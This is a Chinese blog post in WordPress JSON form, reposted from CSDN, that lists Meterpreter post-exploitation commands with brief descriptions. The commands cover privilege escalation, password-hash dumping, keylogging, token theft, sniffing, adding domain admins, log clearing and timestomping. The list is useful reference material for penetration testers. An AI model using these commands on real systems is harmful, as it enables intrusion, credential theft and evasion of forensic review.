\u672c\u6587\u7ae0\u5411\u5927\u5bb6\u4ecb\u7ecd[\u540e\u6e17\u900f]\u83b7\u53d6\u5230 Meterpreter \u4e4b\u540e\u7684\u64cd\u4f5c\uff0c\u4e3b\u8981\u5305\u62ec[\u540e\u6e17\u900f]\u83b7\u53d6\u5230 Meterpreter \u4e4b\u540e\u7684\u64cd\u4f5c\u4f7f\u7528\u5b9e\u4f8b\u3001\u5e94\u7528\u6280\u5de7\u3001\u57fa\u672c\u77e5\u8bc6\u70b9\u603b\u7ed3\u548c\u9700\u8981\u6ce8\u610f\u4e8b\u9879\uff0c\u5177\u6709\u4e00\u5b9a\u7684\u53c2\u8003\u4ef7\u503c\uff0c\u9700\u8981\u7684\u670b\u53cb\u53ef\u4ee5\u53c2\u8003\u4e00\u4e0b\u3002
sysinfo
\u5217\u51fa\u53d7\u63a7\u4e3b\u673a\u7684\u7cfb\u7edf\u4fe1\u606f<\/p>\n\n\n\n
ls
\u5217\u51fa\u76ee\u6807\u4e3b\u673a\u7684\u6587\u4ef6\u548c\u6587\u4ef6\u5939\u4fe1\u606f<\/p>\n\n\n\n
use priv
\u52a0\u8f7d\u7279\u6743\u63d0\u5347\u6269\u5c55\u6a21\u5757\uff0c\u6765\u6269\u5c55meterpreter\u5e93<\/p>\n\n\n\n
ps
\u663e\u793a\u6240\u6709\u8fd0\u884c\u8fdb\u7a0b\u4ee5\u53ca\u5173\u8054\u7684\u7528\u6237\u8d26\u6237<\/p>\n\n\n\n
getsystem
\u901a\u8fc7\u5404\u79cd\u653b\u51fb\u5411\u91cf\u6765\u63d0\u5347\u5230\u7cfb\u7edf\u7528\u6237\u6743\u9650<\/p>\n\n\n\n
shell
\u4ee5\u6240\u6709\u53ef\u7528\u4ee4\u724c\u6765\u8fd0\u884c\u4e00\u4e2a\u4ea4\u4e92\u7684shell<\/p>\n\n\n\n
screenshot
\u5bf9\u76ee\u6807\u4e3b\u673a\u7684\u5c4f\u5e55\u8fdb\u884c\u622a\u56fe<\/p>\n\n\n\n
upload file
\u5411\u76ee\u6807\u4e3b\u673a\u4e0a\u4f20\u6587\u4ef6<\/p>\n\n\n\n
download file
\u4ece\u76ee\u6807\u4e3b\u673a\u4e0b\u8f7d\u6587\u4ef6<\/p>\n\n\n\n
keyscan_dump
\u5b58\u50a8\u76ee\u6807\u4e3b\u673a\u4e0a\u6216\u8bb8\u7684\u952e\u76d8\u8bb0\u5f55<\/p>\n\n\n\n
getprivs
\u5c3d\u53ef\u80fd\u591a\u7684\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u7279\u6743<\/p>\n\n\n\n
background
\u5c06\u4f60\u5f53\u524d\u7684meterpreter shell\u8f6c\u4e3a\u540e\u53f0\u6267\u884c<\/p>\n\n\n\n
hashdump
\u5bfc\u51fa\u76ee\u6807\u4e3b\u673a\u4e2d\u7684\u53e3\u4ee4\u54c8\u5e0c\u503c
help
\u6253\u5f00\u5e2e\u52a9<\/p>\n\n\n\n
run scriptname
\u8fd0\u884cmeterpreter\u811a\u672c\uff0c\u5728scripts\/meterpreter\u76ee\u5f55\u4e0b\u53ef\u67e5\u770b\u5230\u6240\u6709\u811a\u672c\u540d<\/p>\n\n\n\n
migrate PID
\u8fc1\u79fb\u5230\u4e00\u4e2a\u6307\u5b9a\u7684\u8fdb\u7a0bID<\/p>\n\n\n\n
use incognito
\u52a0\u8f7dinconito\u529f\u80fd\uff08\u7528\u6765\u76d7\u53d6\u76ee\u6807\u4e3b\u673a\u7684\u4ee4\u724c\u6216\u662f\u5047\u5192\u7528\u6237\uff09<\/p>\n\n\n\n
list_tokens -u
\u5217\u51fa\u76ee\u6807\u4e3b\u673a\u7528\u6237\u7ec4\u7684\u53ef\u7528\u4ee4\u724c<\/p>\n\n\n\n
impersonate_token DOMAIN_NAME\\USERNAME
\u5047\u5192\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u53ef\u7528\u4ee4\u724c\u3002<\/p>\n\n\n\n
steal_token
\u76d7\u7a83\u7ed9\u5b9a\u8fdb\u7a0b\u7684\u53ef\u7528\u4ee4\u724c\u5e76\u8fdb\u884c\u4ee4\u724c\u5047\u5192<\/p>\n\n\n\n
drop_token
\u505c\u6b62\u5047\u5192\u5f53\u524d\u7684\u4ee4\u724c
execute -f cmd.exe -i
\u6267\u884ccmd.exe\u547d\u4ee4\u5e76\u8fdb\u884c\u4ea4\u4e92\u3002<\/p>\n\n\n\n
execute -f cmd.exe -i -t
\u4ee5\u6240\u6709\u53ef\u7528\u4ee4\u724c\u6765\u6267\u884ccmd\u547d\u4ee4\u3002<\/p>\n\n\n\n
execute -f cmd.exe -i -H -t
\u4ee5\u6240\u6709\u53ef\u7528\u4ee4\u724c\u6765\u6267\u884ccmd\u547d\u4ee4\u5e76\u9690\u85cf\u8be5\u8fdb\u7a0b\u3002
rev2self
\u56de\u5230\u63a7\u5236\u76ee\u6807\u4e3b\u673a\u7684\u521d\u59cb\u7528\u6237\u8d26\u6237\u4e0b\u3002<\/p>\n\n\n\n
reg command
\u5728\u76ee\u6807\u4e3b\u673a\u6ce8\u518c\u8868\u4e2d\u8fdb\u884c\u4ea4\u4e92\uff0c\u521b\u5efa\uff0c\u5220\u9664\u548c\u67e5\u8be2\u7b49\u64cd\u4f5c\u3002<\/p>\n\n\n\n
setdesktop number
\u5207\u6362\u5230\u53e6\u4e00\u4e2a\u7528\u6237\u754c\u9762\uff08\u8be5\u529f\u80fd\u57fa\u4e8e\u90a3\u4e9b\u7528\u6237\u5df2\u767b\u5f55\uff09\u3002<\/p>\n\n\n\n
uietl enable keyboard\/mouse
\u63a5\u7ba1\u76ee\u6807\u4e3b\u673a\u7684\u952e\u76d8\u548c\u9f20\u6807\u3002
use sniffer
\u52a0\u8f7d\u55c5\u63a2\u6a21\u5757<\/p>\n\n\n\n
sniffer_interfaces
\u5217\u51fa\u76ee\u6807\u4e3b\u673a\u6240\u6709\u5f00\u653e\u7684\u7f51\u7edc\u63a5\u53e3<\/p>\n\n\n\n
sniffer_dump interfaceID pcapname
\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u542f\u52a8\u55c5\u63a2<\/p>\n\n\n\n
sniffer_start interfaceID packet_buffer
\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u9488\u5bf9\u7279\u5b9a\u8303\u56f4\u7684\u6570\u636e\u5305\u7f13\u51b2\u533a\u542f\u52a8\u55c5\u63a2<\/p>\n\n\n\n
sniffer_stats interfaceID
\u83b7\u53d6\u6b63\u5728\u5b9e\u65bd\u55c5\u63a2\u7f51\u7edc\u63a5\u53e3\u7684\u7edf\u8ba1\u6570\u636e<\/p>\n\n\n\n
sniffer_stop interfaceID
\u505c\u6b62\u55c5\u63a2
add_user username password -h ip
\u5728\u8fdc\u7a0b\u76ee\u6807\u4e3b\u673a\u4e0a\u6dfb\u52a0\u4e00\u4e2a\u7528\u6237<\/p>\n\n\n\n
add_group_user \u201cDomain Adimins\u201dusername -h ip
\u5c06\u7528\u6237\u6dfb\u52a0\u5230\u76ee\u6807\u4e3b\u673a\u7684\u57df\u7ba1\u7406\u5458\u7ec4\u4e2d<\/p>\n\n\n\n
clearev
\u6e05\u9664\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u65e5\u5fd7\u8bb0\u5f55<\/p>\n\n\n\n
timestomp
\u4fee\u6539\u6587\u4ef6\u5c5e\u6027\uff0c\u4f8b\u5982\u4fee\u6539\u6587\u4ef6\u7684\u521b\u5efa\u65f6\u95f4\uff08\u53cd\u53d6\u8bc1\u8c03\u5dee\uff09<\/p>\n\n\n\n
reboot
\u91cd\u542f\u76ee\u6807\u4e3b\u673a
\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014
\u7248\u6743\u58f0\u660e\uff1a\u672c\u6587\u4e3aCSDN\u535a\u4e3b\u300clvwuwei\u300d\u7684\u539f\u521b\u6587\u7ae0\uff0c\u9075\u5faaCC 4.0 BY-SA\u7248\u6743\u534f\u8bae\uff0c\u8f6c\u8f7d\u8bf7\u9644\u4e0a\u539f\u6587\u51fa\u5904\u94fe\u63a5\u53ca\u672c\u58f0\u660e\u3002
\u539f\u6587\u94fe\u63a5\uff1ahttps:\/\/blog.csdn.net\/lvwuwei\/article\/details\/106348975<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u672c\u6587\u7ae0\u5411\u5927\u5bb6\u4ecb\u7ecd[\u540e\u6e17\u900f]\u83b7\u53d6\u5230 Meterpreter \u4e4b\u540e\u7684\u64cd\u4f5c\uff0c\u4e3b\u8981\u5305\u62ec[\u540e\u6e17\u900f]\u83b7\u53d6\u5230 Meterpr […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-22","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/22","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/22\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}